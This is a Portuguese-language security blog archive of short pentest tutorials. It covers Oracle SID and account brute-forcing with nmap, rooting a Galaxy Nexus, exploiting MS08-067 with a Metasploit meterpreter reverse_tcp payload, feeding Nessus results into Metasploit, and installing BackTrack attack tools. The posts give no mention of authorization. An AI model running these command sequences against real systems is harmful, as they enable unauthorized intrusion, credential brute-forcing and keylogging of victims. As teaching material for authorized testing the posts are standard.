Anúncios

Arquivo

Posts Tagged ‘how to’

Dica para pentest: Descobrindo contas de usuário no Oracle com o Nmap


Olá a todos mais uma vez

Gostaria de passar hoje uma dica para quem for executar um pentest, ou apenas para aprendizado mesmo.

Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.

basta fazer o seguinte:

Execute o comando: nmap –script oracle-sid-brute 192.168.0.12

O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL

ScreenHunter_06 Mar. 11 13.22

 

Feito isso basta executar o próximo comando: nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL 192.168.0.12

ScreenHunter_06 Mar. 11 13.27

 

Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.

Espero que tenham gostado da dica e não se esqueça de compartilhar

Abraços

Anúncios

Tutorial: Como fazer root no Galaxy Nexus com Android 4.2.2


Olá a todos

Segue o passo a passo para fazer o root no Galaxy Nexus com a versão recém liberada do Android a 4.2.2

Segue os pré requisitos

1 – Android SDK com ADT Bundle configurado

Maiores informações sobre como deixar isso configurado siga esse procedimento aqui

http://developer.android.com/sdk/installing/bundle.html

2 – Drivers USB do Galaxy Nexus

Faça o download do Galaxy Nexus Toolkit no site do XDA-Developers. http://forum.xda-developers.com/showthread.php?t=1392310

Abra o Galaxy Nexus Toolkit e selecione, digitando o número, a opção que corresponde ao seu aparelho e versão do Android. No meu caso foi a 7.

O Primeiro passo é fazer a instalação dos drivers no PC para isso digite a opção 1 aguarde a instalação do driver e conecte o aparelho com o cabo USB

OBS: se vc já seguiu nossa dica anterior para o android 4.2.1 vc não precisa fazer o passo acima

3 – Backup de todos os seus dados nunca é demais

Eu fui corajoso aqui e fiz sem backup mesmo, não tive problemas, mas aí é por sua conta e risco.

Agora vamos lá

1 – Baixe o arquivo SuperSU v1.04 (UPDATE-SuperSU-v1.04.zip)

http://dl.dropbox.com/u/26229715/UPDATE-SuperSU-v1.04.zip

2 – Copie esse arquivo para o Galaxy nexus usando o cabo USB

3 – Desligue o Fone

4 – Baixe o arquivo recovery-clockwork-touch-6.0.2.3-maguro.img

http://dl.dropbox.com/u/26229715/recovery-clockwork-touch-6.0.2.3-maguro.img

Copie esse arquivo para \adt-bundle(OS-VERSION)\sdk\plataform-tools

5 – Inicie em Modo Fastboot/Bootloader. Para isso segure a tecla de volume down e pressione a tecla Power por alguns segundos até ligar.

6 – Abra um prompt de comando em \adt-bundle(OS-VERSION)\sdk\plataform-tools e execute o comando

fastboot flash recovery recovery-clockwork-touch-6.0.2.3-maguro.img

7 – Ainda em modo fastboot usando as teclas de volume selecione Recover

8 – Em ClockwordMod recovery selecione “install zip from SD CARD” selecione “choose zip from SD card” navegue até achar o arquivo UPDATE-SuperSU-v1.04.zip e instale ele.

Volte ao menu principal do ClockwordMod Recovery e selecione “reboot now”

Feito isso vc vai ter acesso root ao seu Galaxy Nexus.

Espero que tenham gostado e até a próxima

E não se esqueça de compartilhar também.

Abraço

Explorando vulnerabilidades usando Metasploit Framework


Olá, na sequência de nosso último post gostaria de mostrar aqui a forma básica de se explorar uma vulnerabilidade, suponhamos o que sistema alvo tenha a vulnerabilidade MS 08-067 podemos usar localizar um exploit para ela usando o comando search exploits 08-067

Localizado o exploit vamos usá-lo para isso digite

use exploit/windows/smb/ms08_067_netapi

Depois show payloads para ver quais estão disponíveis daí faça a sequência de comandos

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [IP do BACKTRACK]

set RHOST [IP DO ALVO]

exploit

Feito isso agora é só explorar as possibilidades de exploração como screenshots, keyloggers e muitas outras opções no sistema comprometido.

Gostou? Compartilhe por favor.

Se sua empresa precisa de Suporte Técnico e Consultoria acesse: www.infrasecurity.com.br

 

Usando Nessus e Metasploit juntos


Olá a todos

Nessa dica gostaria de mostrar como usar o nessus juntamente com o Metasploit, fazer isso auxilia muito na hora de encontrar e explorar vulnerabilidades nos sistemas alvo.

Para usar você precisa ter o Nessus instalado e configurado para uso seja no backtrack ou em outra máquina.

Vai precisar também do Metaspoit Framework do Backtrack 5 R3

Abra o Metasploit e na console digite load nessus para carregar o plugin do nessus.

Para conectar à sua instalação do nessus digite nessus_connect msf:msf@127.0.0.1:8843 ok

Mude o local onde está msf:msf pelo seu login e senha de acesso ao sistema Nessus e se necessário caso o Nessus esteja em outra máquina que não seja o Backtrack mude 127.0.0.1 para o IP do computador que tem o Nessus instalado.

Digite nessus_policy_list para ver quais as polices disponíveis para fazer o scan. Numa instalação padrão vai aparecer 4 opções

1- Internal Network Scan

2- External Network Scan

3- Web App Tests

4- Prepare for PCI-DSS audits

Com essa informação em mãos vamos criar um novo scan para isso digite nessus_scan_new 1 WindowsXP 192.168.2.93

No comando acima substitua pelo número ID da police que deseja usar, para teste numa rede local pode usar 1 mesmo. Onde está escrito WindowsXP você pode colocar o nome que desejar para identificar a rotina e evidentemente você deve substituir o IP pelo do seu sistema alvo.

Digite nessus_scan_status para acompanhar o progresso até a conclusão quando acabar digite nessus_report_list e você vai poder visualizar o id e nome do Scan que acabou de ser realizado para analisar as vulnerabilidades encontradas digite nessus_report_vulns 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Substitua 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc pelo ID que vai ser exibido pra você quando executar o nessus_report_list

Para importar esse relatório para o Metasploit digite nessus_report_get 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Agora digite vulns e visualizará as vulnerabilidades encontradas.

Suponhamos, como exemplo, que tenha encontrado a Vulnerabilidade MS12-020 para localizar um exploit para ela digite search exploits 12-020

Daí é só ir explorando! No próximo post darei um exemplo de como explorar uma dessas vulnerabilidades.

Espero que tenham gostado e até a próxima.

Caso precise de Suporte e Consultoria acesse www.infrasecurity.com.br

Se gostou compartilhe!

Abraço

Atualizar Backtrack 5 para a versão R3


Olá a todos

Estou escrevendo para mostrar como fazer o upgrade do Backtrack versão 5 R2 para R3. Nesta versão além de bugs que foram corrigidos também foram adicionadas novas ferramentas. O processo é bem simples e basta seguir alguns passos o primeiro para atualizar a versão

apt-get update && apt-get dist-upgrade

Depois digite um dos seguintes comandos de acordo com sua plataforma 32 ou 64 bits. Isto é necessário para instalar as novas ferramentas

32 bits: apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

64 bits: apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

%d blogueiros gostam disto: